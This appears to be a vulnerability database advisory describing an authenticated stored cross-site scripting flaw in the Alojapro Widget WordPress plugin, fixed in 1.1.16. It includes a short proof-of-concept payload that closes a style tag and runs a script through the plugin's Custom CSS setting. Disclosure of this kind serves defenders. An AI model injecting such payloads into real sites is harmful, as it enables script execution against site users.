WordPress Plugin Vulnerabilities

Alojapro Widget < 1.1.16 - Authenticated Stored Cross-Site Scripting (XSS)

Description

The plugin doesn't properly sanitise its Custom CSS settings, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed

Proof of Concept

Put the following code in the Custom CSS settings of the plugin

</style>
<script>
setTimeout("alert('1')",3000)
</script>
<style>

Affects Plugins

Fixed in 1.1.16

References

Classification

Type
XSS
CWE
CVSS

Miscellaneous

Original Researcher
xiahao
Submitter
xiahao
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2021-07-29 (about 2 years ago)
Added
2021-08-19 (about 2 years ago)
Last Updated
2022-04-09 (about 2 years ago)

Other